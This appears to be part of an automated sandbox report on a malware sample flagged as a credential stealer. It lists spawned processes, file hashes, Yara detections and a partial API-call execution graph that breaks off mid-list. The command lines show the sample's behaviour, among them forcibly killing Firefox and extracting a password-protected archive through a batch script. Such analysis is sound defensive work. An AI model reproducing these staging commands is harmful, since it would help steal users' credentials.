                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                                Start time:07:53:20
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe"
                                                                                                                                                                                                                                                Imagebase:0xb60000
                                                                                                                                                                                                                                                File size:2'817'536 bytes
                                                                                                                                                                                                                                                MD5 hash:B0B3FC8A43169DD5D7E252EF410E48B5
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                                Start time:07:53:23
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                                                Imagebase:0x7ff6de410000
                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                                                                Start time:07:53:23
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                                                                Start time:07:53:23
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                Imagebase:0xd40000
                                                                                                                                                                                                                                                File size:74'240 bytes
                                                                                                                                                                                                                                                MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                                                                Start time:07:53:23
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                                                                Start time:07:53:26
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe"
                                                                                                                                                                                                                                                Imagebase:0x7b0000
                                                                                                                                                                                                                                                File size:1'177'600 bytes
                                                                                                                                                                                                                                                MD5 hash:42A8588CC82773CD223C42F8FE4BE91A
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:48
                                                                                                                                                                                                                                                Start time:07:53:26
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:mode 65,10
                                                                                                                                                                                                                                                Imagebase:0x7ff64d5f0000
                                                                                                                                                                                                                                                File size:33'280 bytes
                                                                                                                                                                                                                                                MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:49
                                                                                                                                                                                                                                                Start time:07:53:27
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe"
                                                                                                                                                                                                                                                Imagebase:0x260000
                                                                                                                                                                                                                                                File size:727'552 bytes
                                                                                                                                                                                                                                                MD5 hash:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3579214333.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3737049743.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3747345437.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3686997527.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3640935560.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3594359460.0000000000EAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3800189452.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3794953887.0000000000EB3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3635862582.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3699711615.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3502366126.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3565383348.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3640504531.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3710394549.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3520649218.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3399514607.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3727950769.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3711429729.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3711095676.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3642838131.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3709485651.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3511558858.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3499493835.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3560203772.0000000000EAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3640665379.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3396662848.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3710197474.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3712057939.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3668612150.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:52
                                                                                                                                                                                                                                                Start time:07:53:29
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                                                                                Imagebase:0x8d0000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:53
                                                                                                                                                                                                                                                Start time:07:53:30
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x8d0000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:4.4%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:2.8%
                                                                                                                                                                                                                                                  Total number of Nodes:762
                                                                                                                                                                                                                                                  Total number of Limit Nodes:24
                                                                                                                                                                                                                                                  execution_graph 11335 f387b2 11336 f387b6 11335->11336 11337 f387b8 GetFileAttributesA 11335->11337 11336->11337 11338 f387c4 11337->11338 11686 f342b0 11689 f33ac0 11686->11689 11688 f342bb shared_ptr 11690 f33af9 11689->11690 11693 f33c38 11690->11693 11694 f33b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11690->11694 11699 f332d0 11690->11699 11691 f332d0 6 API calls 11696 f33c5f 11691->11696 11693->11691 11693->11696 11694->11688 11695 f33c68 11695->11688 11696->11695 11718 f33810 11696->11718 11700 f4c6ac GetSystemTimePreciseAsFileTime 11699->11700 11707 f33314 11700->11707 11701 f3336b 11702 f4c26a 5 API calls 11701->11702 11703 f3333c __Mtx_unlock 11702->11703 11705 f4c26a 5 API calls 11703->11705 11708 f33350 std::invalid_argument::invalid_argument 11703->11708 11706 f33377 11705->11706 11709 f4c6ac GetSystemTimePreciseAsFileTime 11706->11709 11707->11701 11707->11703 11722 f4bd4c 11707->11722 11708->11693 11710 f333af 11709->11710 11711 f4c26a 5 API calls 11710->11711 11712 f333b6 __Cnd_broadcast 11710->11712 11711->11712 11713 f4c26a 5 API calls 11712->11713 11714 f333d7 __Mtx_unlock 11712->11714 11713->11714 11715 f4c26a 5 API calls 11714->11715 11716 f333eb 11714->11716 11717 f3340e 11715->11717 11716->11693 11717->11693 11719 f3381c 11718->11719 11731 f32440 11719->11731 11725 f4bb72 11722->11725 11724 f4bd5c 11724->11707 11726 f4bb9c 11725->11726 11727 f4cf6b _xtime_get GetSystemTimePreciseAsFileTime 11726->11727 11730 f4bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 11726->11730 11728 f4bbcf __Xtime_diff_to_millis2 11727->11728 11729 f4cf6b _xtime_get GetSystemTimePreciseAsFileTime 11728->11729 11728->11730 11729->11730 11730->11724 11734 f4b5d6 11731->11734 11733 f32472 11735 f4b5f1 Concurrency::cancel_current_task 11734->11735 11736 f68bec __fassign 4 API calls 11735->11736 11738 f4b658 __fassign std::invalid_argument::invalid_argument 11735->11738 11737 f4b69f 11736->11737 11738->11733 12031 f377b0 12032 f377f1 shared_ptr 12031->12032 12033 f35c10 6 API calls 12032->12033 12034 f37883 shared_ptr 12032->12034 12033->12034 12035 f35c10 6 API calls 12034->12035 12037 f37953 shared_ptr std::invalid_argument::invalid_argument 12034->12037 12036 f379e3 12035->12036 12038 f35c10 6 API calls 12036->12038 12039 f37a15 shared_ptr 12038->12039 12040 f35c10 6 API calls 12039->12040 12045 f37aa5 shared_ptr std::invalid_argument::invalid_argument 12039->12045 12041 f37b7d 12040->12041 12042 f35c10 6 API calls 12041->12042 12043 f37ba0 12042->12043 12044 f35c10 6 API calls 12043->12044 12044->12045 12046 f387b0 12047 f387b6 12046->12047 12048 f387b8 GetFileAttributesA 12046->12048 12047->12048 12049 f387c4 12048->12049 12124 f32170 12127 f4c6fc 12124->12127 12126 f3217a 12128 f4c724 12127->12128 12129 f4c70c 12127->12129 12128->12126 12129->12128 12131 f4cfbe 12129->12131 12132 f4ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12131->12132 12133 f4cfd0 12132->12133 12133->12129 12134 f3ad70 12135 f3aec0 shared_ptr std::invalid_argument::invalid_argument 12134->12135 12137 f3addc shared_ptr 12134->12137 12137->12135 12138 f68ab6 12137->12138 12139 f68ad1 12138->12139 12140 f68868 4 API calls 12139->12140 12141 f68adb 12140->12141 12141->12137 12160 f38d30 12161 f38d80 12160->12161 12162 f35c10 6 API calls 12161->12162 12163 f38d9a shared_ptr std::invalid_argument::invalid_argument 12162->12163 12050 f447b0 12052 f44eed 12050->12052 12051 f44f59 shared_ptr std::invalid_argument::invalid_argument 12052->12051 12053 f37d30 7 API calls 12052->12053 12054 f450ed 12053->12054 12089 f38380 12054->12089 12056 f45106 12057 f35c10 6 API calls 12056->12057 12058 f45155 12057->12058 12059 f35c10 6 API calls 12058->12059 12060 f45171 12059->12060 12095 f39a00 12060->12095 12090 f383e5 __cftof 12089->12090 12091 f35c10 6 API calls 12090->12091 12092 f38403 shared_ptr std::invalid_argument::invalid_argument 12090->12092 12093 f38427 12091->12093 12092->12056 12094 f35c10 6 API calls 12093->12094 12094->12092 12096 f39a3f 12095->12096 12097 f35c10 6 API calls 12096->12097 12098 f39a47 12097->12098 12099 f38b30 6 API calls 12098->12099 12100 f39a58 12099->12100 11822 f34276 11823 f32410 5 API calls 11822->11823 11824 f3427f 11823->11824 11854 f3a9f4 11863 f39230 11854->11863 11856 f3aa03 shared_ptr 11857 f35c10 6 API calls 11856->11857 11862 f3aab3 shared_ptr std::invalid_argument::invalid_argument 11856->11862 11858 f3aa65 11857->11858 11859 f35c10 6 API calls 11858->11859 11860 f3aa8d 11859->11860 11861 f35c10 6 API calls 11860->11861 11861->11862 11866 f39284 shared_ptr 11863->11866 11864 f35c10 6 API calls 11864->11866 11865 f39543 shared_ptr std::invalid_argument::invalid_argument 11865->11856 11866->11864 11871 f3944f shared_ptr 11866->11871 11867 f35c10 6 API calls 11867->11871 11868 f398b5 shared_ptr std::invalid_argument::invalid_argument 11868->11856 11869 f3979f shared_ptr 11869->11868 11870 f35c10 6 API calls 11869->11870 11872 f39927 shared_ptr std::invalid_argument::invalid_argument 11870->11872 11871->11865 11871->11867 11871->11869 11872->11856 11743 f39ab8 11745 f39acc 11743->11745 11746 f39b08 11745->11746 11747 f3a917 11746->11747 11749 f39b4b shared_ptr 11746->11749 11748 f3a953 Sleep CreateMutexA 11747->11748 11752 f3a98e 11748->11752 11750 f39b59 11749->11750 11751 f35c10 6 API calls 11749->11751 11753 f39b7c 11751->11753 11754 f38b30 6 API calls 11753->11754 11755 f39b8d 11754->11755 11756 f35c10 6 API calls 11755->11756 11757 f39cb1 11756->11757 11758 f38b30 6 API calls 11757->11758 11759 f39cc2 11758->11759 11339 f3b1a0 11340 f3b1f2 11339->11340 11341 f3b3ad CoInitialize 11340->11341 11342 f3b3fa shared_ptr std::invalid_argument::invalid_argument 11341->11342 11760 f320a0 11761 f4c68b __Mtx_init_in_situ 2 API calls 11760->11761 11762 f320ac 11761->11762 11873 f33fe0 11874 f34022 11873->11874 11875 f340d2 11874->11875 11876 f3408c 11874->11876 11879 f34035 std::invalid_argument::invalid_argument 11874->11879 11886 f33ee0 11875->11886 11880 f335e0 11876->11880 11881 f33616 11880->11881 11884 f3364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 11881->11884 11892 f32ce0 11881->11892 11883 f3369e 11883->11884 11901 f32c00 11883->11901 11884->11879 11887 f33f48 11886->11887 11888 f33f1e 11886->11888 11889 f33f58 11887->11889 11890 f32c00 3 API calls 11887->11890 11888->11879 11889->11879 11891 f33f7f 11890->11891 11891->11879 11893 f32d1d 11892->11893 11894 f4bedf InitOnceExecuteOnce 11893->11894 11895 f32d46 11894->11895 11896 f32d51 std::invalid_argument::invalid_argument 11895->11896 11898 f32d88 11895->11898 11908 f4bef7 11895->11908 11896->11883 11899 f32440 4 API calls 11898->11899 11900 f32d9b 11899->11900 11900->11883 11902 f32c0e 11901->11902 11921 f4b847 11902->11921 11904 f32c42 11905 f32c49 11904->11905 11927 f32c80 11904->11927 11905->11884 11907 f32c58 Concurrency::cancel_current_task 11909 f4bf03 Concurrency::cancel_current_task 11908->11909 11910 f4bf73 11909->11910 11911 f4bf6a 11909->11911 11913 f32ae0 5 API calls 11910->11913 11915 f4be7f 11911->11915 11914 f4bf6f 11913->11914 11914->11898 11916 f4cc31 InitOnceExecuteOnce 11915->11916 11917 f4be97 11916->11917 11918 f4be9e 11917->11918 11919 f66cbb 4 API calls 11917->11919 11918->11914 11920 f4bea7 11919->11920 11920->11914 11922 f4b854 11921->11922 11926 f4b873 Concurrency::details::_Reschedule_chore 11921->11926 11930 f4cb77 11922->11930 11924 f4b864 11924->11926 11932 f4b81e 11924->11932 11926->11904 11938 f4b7fb 11927->11938 11929 f32cb2 shared_ptr 11929->11907 11931 f4cb92 CreateThreadpoolWork 11930->11931 11931->11924 11933 f4b827 Concurrency::details::_Reschedule_chore 11932->11933 11936 f4cdcc 11933->11936 11935 f4b841 11935->11926 11937 f4cde1 TpPostWork 11936->11937 11937->11935 11939 f4b807 11938->11939 11940 f4b817 11938->11940 11939->11940 11942 f4ca78 11939->11942 11940->11929 11943 f4ca8d TpReleaseWork 11942->11943 11943->11940 12167 f34120 12168 f3416a 12167->12168 12169 f33ee0 3 API calls 12168->12169 12170 f341b2 Concurrency::details::_ContextCallback::_CallInContext std::invalid_argument::invalid_argument 12168->12170 12169->12170 12171 f3af20 12172 f3af63 12171->12172 12183 f66660 12172->12183 12177 f6663f 4 API calls 12178 f3af80 12177->12178 12179 f6663f 4 API calls 12178->12179 12180 f3af98 __cftof 12179->12180 12189 f355f0 12180->12189 12182 f3b04e shared_ptr std::invalid_argument::invalid_argument 12184 f6a671 __fassign 4 API calls 12183->12184 12185 f3af69 12184->12185 12186 f6663f 12185->12186 12187 f6a671 __fassign 4 API calls 12186->12187 12188 f3af71 12187->12188 12188->12177 12190 f35610 12189->12190 12190->12190 12192 f35710 std::invalid_argument::invalid_argument 12190->12192 12193 f322c0 12190->12193 12192->12182 12196 f32280 12193->12196 12197 f32296 12196->12197 12200 f687f8 12197->12200 12203 f67609 12200->12203 12202 f322a4 12202->12190 12204 f67649 12203->12204 12207 f67631 ___std_exception_copy std::invalid_argument::invalid_argument 12203->12207 12205 f6690a __fassign 4 API calls 12204->12205 12204->12207 12206 f67661 12205->12206 12209 f67bc4 12206->12209 12207->12202 12211 f67bd5 12209->12211 12210 f67be4 ___std_exception_copy 12210->12207 12211->12210 12216 f68168 12211->12216 12221 f67dc2 12211->12221 12226 f67de8 12211->12226 12236 f67f36 12211->12236 12217 f68171 12216->12217 12218 f68178 12216->12218 12245 f67b50 12217->12245 12218->12211 12220 f68177 12220->12211 12222 f67dcb 12221->12222 12224 f67dd2 12221->12224 12223 f67b50 4 API calls 12222->12223 12225 f67dd1 12223->12225 12224->12211 12225->12211 12227 f67e09 ___std_exception_copy 12226->12227 12228 f67def 12226->12228 12227->12211 12228->12227 12229 f67f69 12228->12229 12231 f67fa2 12228->12231 12234 f67f77 12228->12234 12229->12234 12235 f67f8b 12229->12235 12253 f68241 12229->12253 12231->12235 12249 f68390 12231->12249 12234->12235 12257 f686ea 12234->12257 12235->12211 12237 f67f69 12236->12237 12240 f67f4f 12236->12240 12239 f67f8b 12237->12239 12241 f68241 4 API calls 12237->12241 12243 f67f77 12237->12243 12238 f67fa2 12238->12239 12242 f68390 4 API calls 12238->12242 12239->12211 12240->12237 12240->12238 12240->12243 12241->12243 12242->12243 12243->12239 12244 f686ea 4 API calls 12243->12244 12244->12239 12246 f67b62 12245->12246 12247 f68ab6 4 API calls 12246->12247 12248 f67b85 12247->12248 12248->12220 12251 f683ab 12249->12251 12250 f683dd 12250->12234 12251->12250 12261 f6c88e 12251->12261 12254 f6825a 12253->12254 12268 f6d3c8 12254->12268 12256 f6830d 12256->12234 12258 f6875d std::invalid_argument::invalid_argument 12257->12258 12260 f68707 12257->12260 12258->12235 12259 f6c88e __cftof 4 API calls 12259->12260 12260->12258 12260->12259 12264 f6c733 12261->12264 12263 f6c8a6 12263->12250 12265 f6c743 12264->12265 12266 f6c748 __cftof ___std_exception_copy 12265->12266 12267 f6690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12265->12267 12266->12263 12267->12266 12269 f6d3d8 ___std_exception_copy 12268->12269 12271 f6d3ee 12268->12271 12269->12256 12270 f6d485 12274 f6d4e4 12270->12274 12275 f6d4ae 12270->12275 12271->12269 12271->12270 12272 f6d48a 12271->12272 12281 f6cbdf 12272->12281 12298 f6cef8 12274->12298 12277 f6d4b3 12275->12277 12278 f6d4cc 12275->12278 12287 f6d23e 12277->12287 12294 f6d0e2 12278->12294 12282 f6cbf1 12281->12282 12283 f6690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12282->12283 12284 f6cc05 12283->12284 12285 f6cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 12284->12285 12286 f6cc0d __alldvrm __cftof ___std_exception_copy _strrchr 12284->12286 12285->12286 12286->12269 12288 f6d26c 12287->12288 12289 f6d2de 12288->12289 12291 f6d2b7 12288->12291 12293 f6d2a5 12288->12293 12290 f6cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12289->12290 12290->12293 12292 f6d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12291->12292 12292->12293 12293->12269 12295 f6d10f 12294->12295 12296 f6d14e 12295->12296 12297 f6d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12295->12297 12296->12269 12297->12296 12299 f6cf10 12298->12299 12300 f6cf75 12299->12300 12301 f6cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12299->12301 12300->12269 12301->12300 12101 f39ba5 12102 f39ba7 12101->12102 12103 f35c10 6 API calls 12102->12103 12104 f39cb1 12103->12104 12105 f38b30 6 API calls 12104->12105 12106 f39cc2 12105->12106 11584 f66629 11585 f664c7 __fassign 3 API calls 11584->11585 11586 f6663a 11585->11586 12112 f32b90 12113 f32bce 12112->12113 12114 f4b7fb TpReleaseWork 12113->12114 12115 f32bdb shared_ptr std::invalid_argument::invalid_argument 12114->12115 12302 f32b10 12303 f32b1a 12302->12303 12304 f32b1c 12302->12304 12305 f4c26a 5 API calls 12304->12305 12306 f32b22 12305->12306 11944 f487d0 11945 f4882a __cftof 11944->11945 11951 f49bb0 11945->11951 11949 f4886c std::invalid_argument::invalid_argument 11950 f488d9 std::_Throw_future_error 11964 f49ef0 11951->11964 11953 f49be5 11954 f32ce0 5 API calls 11953->11954 11955 f49c16 11954->11955 11968 f49f70 11955->11968 11957 f48854 11957->11949 11958 f343f0 11957->11958 11959 f4bedf InitOnceExecuteOnce 11958->11959 11960 f3440a 11959->11960 11961 f34411 11960->11961 11962 f66cbb 4 API calls 11960->11962 11961->11950 11963 f34424 11962->11963 11965 f49f0c 11964->11965 11966 f4c68b __Mtx_init_in_situ 2 API calls 11965->11966 11967 f49f17 11966->11967 11967->11953 11969 f49fef shared_ptr 11968->11969 11972 f4a058 11969->11972 11973 f4a210 11969->11973 11971 f4a03b 11971->11957 11974 f4a290 11973->11974 11980 f471d0 11974->11980 11976 f4a2cc shared_ptr 11977 f33ee0 3 API calls 